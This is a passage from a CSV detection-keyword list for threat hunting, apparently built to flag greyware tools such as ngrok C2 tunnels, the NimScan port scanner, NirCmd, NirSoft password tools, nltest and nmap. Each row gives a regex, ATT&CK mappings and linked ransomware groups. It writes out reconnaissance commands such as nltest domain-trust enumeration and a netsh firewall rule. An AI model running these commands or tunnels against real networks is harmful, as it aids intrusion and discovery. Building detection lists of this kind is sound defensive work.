- T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*ngrokd.ngrok.com*",".{0,1000}ngrokd\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tcp://0.tcp.ngrok.io:*",".{0,1000}tcp\:\/\/0\.tcp\.ngrok\.io\:.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 
usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*tunnel.ap.ngrok.com*",".{0,1000}tunnel\.ap\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tunnel.au.ngrok.com*",".{0,1000}tunnel\.au\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tunnel.eu.ngrok.com*",".{0,1000}tunnel\.eu\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - 
","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tunnel.in.ngrok.com*",".{0,1000}tunnel\.in\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tunnel.jp.ngrok.com*",".{0,1000}tunnel\.jp\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tunnel.sa.ngrok.com*",".{0,1000}tunnel\.sa\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in 
https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "*tunnel.us.ngrok.com*",".{0,1000}tunnel\.us\.ngrok\.com.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002 ","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","also seen in https://github.com/Velocidex/velociraptor-sigma-rules/blob/master/rules%2Flinux%2Fgeneric%2Fnetwork_connection%2Fnet_connection_lnx_ngrok_tunnel.yaml","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z" "* NimScan.exe*",".{0,1000}\sNimScan\.exe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "* NimScan.nim*",".{0,1000}\sNimScan\.nim.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*/NimScan.exe*",".{0,1000}\/NimScan\.exe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*/NimScan.git*",".{0,1000}\/NimScan\.git.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support 
only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*/NimScan.nim*",".{0,1000}\/NimScan\.nim.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*\NimScan.exe*",".{0,1000}\\NimScan\.exe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*\NimScan.nim*",".{0,1000}\\NimScan\.nim.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*>NimScan<*",".{0,1000}\>NimScan\<.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*162b04e6c89653b10bd38def513051067393d9080afd777210b0ce44f1a7d9fe*",".{0,1000}162b04e6c89653b10bd38def513051067393d9080afd777210b0ce44f1a7d9fe.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" 
"*394daa8e246f41baa4f37b1721991248f003766f079e671b8e51794259818c91*",".{0,1000}394daa8e246f41baa4f37b1721991248f003766f079e671b8e51794259818c91.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*662d9dd3a88b004a8eb3e5944457a1661ec7a28dd4695d6f96fbcbf095ba057a*",".{0,1000}662d9dd3a88b004a8eb3e5944457a1661ec7a28dd4695d6f96fbcbf095ba057a.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*72605e93bf880f32e23eb3b5d1ab30a66c7a2beb3c195d5d2bc5738e1b7ddbf5*",".{0,1000}72605e93bf880f32e23eb3b5d1ab30a66c7a2beb3c195d5d2bc5738e1b7ddbf5.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*9084acb8a61d051af66cad27ceb81976c45c4378e9846a22d8befe3294217e7d*",".{0,1000}9084acb8a61d051af66cad27ceb81976c45c4378e9846a22d8befe3294217e7d.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*b6911a2d3730f3bbcd89d503ac1226d6e6172cb49d3c92d04df933ef3c9e1531*",".{0,1000}b6911a2d3730f3bbcd89d503ac1226d6e6172cb49d3c92d04df933ef3c9e1531.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support 
only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*ca96a1f8836f1c1afdf2c410e9d686f7beca7784e859971a493a6610522708e2*",".{0,1000}ca96a1f8836f1c1afdf2c410e9d686f7beca7784e859971a493a6610522708e2.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*dacdb4976fd75ab2fd7bb22f1b2f9d986f5d92c29555ce2b165c020e2816a200*",".{0,1000}dacdb4976fd75ab2fd7bb22f1b2f9d986f5d92c29555ce2b165c020e2816a200.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*e43d66b7a4fa09a0714c573fbe4996770d9d85e31912480e73344124017098f9*",".{0,1000}e43d66b7a4fa09a0714c573fbe4996770d9d85e31912480e73344124017098f9.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","#filehash","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*elddy/NimScan*",".{0,1000}elddy\/NimScan.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","1","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*-l:NimScanToC.a *",".{0,1000}\-l\:NimScanToC\.a\s.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support 
only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*netsh advfirewall firewall add rule name='NimScan'*",".{0,1000}netsh\sadvfirewall\sfirewall\sadd\srule\sname\=\'NimScan\'.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*NimScan * -p:*",".{0,1000}NimScan\s.{0,1000}\s\-p\:.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "*NimScan finished in:*",".{0,1000}NimScan\sfinished\sin\:.{0,1000}","greyware_tool_keyword","NimScan","Really fast port scanner (With filtered option - Windows support only)","T1046","TA0007","N/A","N/A","Discovery","https://github.com/elddy/NimScan","1","0","N/A","N/A","8","4","376","37","2022-02-10T13:23:02Z","2020-08-12T14:20:46Z" "* nircmd.exe*",".{0,1000}\snircmd\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* nircmdc.exe*",".{0,1000}\snircmdc\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/nircmd.exe*",".{0,1000}\/nircmd\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/nircmd.zip*",".{0,1000}\/nircmd\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/nircmdc.exe*",".{0,1000}\/nircmdc\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/nircmd-x64.zip*",".{0,1000}\/nircmd\-x64\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\nircmd.exe*",".{0,1000}\\nircmd\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\nircmd.zip*",".{0,1000}\\nircmd\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\nircmdc.exe*",".{0,1000}\\nircmdc\.exe.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\nircmd-x64.zip*",".{0,1000}\\nircmd\-x64\.zip.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*nircmd.exe *",".{0,1000}nircmd\.exe\s.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*nircmdc.exe *",".{0,1000}nircmdc\.exe\s.{0,1000}","greyware_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://www.nirsoft.net/toolsdownload/*",".{0,1000}https\:\/\/www\.nirsoft\.net\/toolsdownload\/.{0,1000}","greyware_tool_keyword","nirsoft tools","NirSoft is a legitimate software company that develops system utilities for Windows. Some of its tools can be used by malicious actors to recover passwords harvest sensitive information and conduct password attacks.","T1003 - T1003.001 - T1003.002 - T1110 - T1566","TA0002 - TA0003 - TA0004 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Collection","N/A","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*https://www.nirsoft.net/toolsdownload/*.exe*",".{0,1000}https\:\/\/www\.nirsoft\.net\/toolsdownload\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*https://www.nirsoft.net/toolsdownload/*.zip*",".{0,1000}https\:\/\/www\.nirsoft\.net\/toolsdownload\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*https://www.nirsoft.net/utils/*.exe*",".{0,1000}https\:\/\/www\.nirsoft\.net\/utils\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*https://www.nirsoft.net/utils/*.zip*",".{0,1000}https\:\/\/www\.nirsoft\.net\/utils\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*nltest /dclist:*",".{0,1000}nltest\s\/dclist\:.{0,1000}","greyware_tool_keyword","nltest","Get the list of domain controllers for the specified domain","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /all_trusts*",".{0,1000}nltest\s\/all_trusts.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /dclist*",".{0,1000}nltest\s\/dclist.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /domain_trusts /v*",".{0,1000}nltest\s\/domain_trusts\s\/v.{0,1000}","greyware_tool_keyword","nltest","Dump Domain Trust Information","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /domain_trusts*",".{0,1000}nltest\s\/domain_trusts.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /dsgetdc:* 
/force*",".{0,1000}nltest\s\/dsgetdc\:.{0,1000}\s\/force.{0,1000}","greyware_tool_keyword","nltest","Force a re-discovery of Domain Controller","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /dsgetdc:* /force*",".{0,1000}nltest\s\/dsgetdc\:.{0,1000}\s\/force.{0,1000}","greyware_tool_keyword","nltest","Force a re-discovery of trusted domains","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /sc_reset /force*",".{0,1000}nltest\s\/sc_reset\s\/force.{0,1000}","greyware_tool_keyword","nltest","Force a re-authentication on the secure channel","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /server:* /domain_trusts*",".{0,1000}nltest\s\/server\:.{0,1000}\s\/domain_trusts.{0,1000}","greyware_tool_keyword","nltest","List information about all trusted domains from a specific server","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest /server:* /trusted_domains /v*",".{0,1000}nltest\s\/server\:.{0,1000}\s\/trusted_domains\s\/v.{0,1000}","greyware_tool_keyword","nltest","Check all trusted domains of a specific server (verbose mode)","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*nltest -dsgetdc*",".{0,1000}nltest\s\-dsgetdc.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*./nmap*",".{0,1000}\.\/nmap.{0,1000}","greyware_tool_keyword","nmap","A very common tool. 
Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap","1","1","N/A","greyware tool - risks of False positive !","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*./test/nmap*/*.nse*",".{0,1000}\.\/test\/nmap.{0,1000}\/.{0,1000}\.nse.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/Nmap/folder/check15*",".{0,1000}\/Nmap\/folder\/check15.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/Nmap/folder/check16*",".{0,1000}\/Nmap\/folder\/check16.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" 
"*/Nmap/folder/check17*",".{0,1000}\/Nmap\/folder\/check17.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/nmaplowercheck15*",".{0,1000}\/nmaplowercheck15.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://nmap.org/book/nse-usage.html","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","N/A","N/A","N/A","N/A" "*/nmaplowercheck16*",".{0,1000}\/nmaplowercheck16.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/nmaplowercheck17*",".{0,1000}\/nmaplowercheck17.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - 
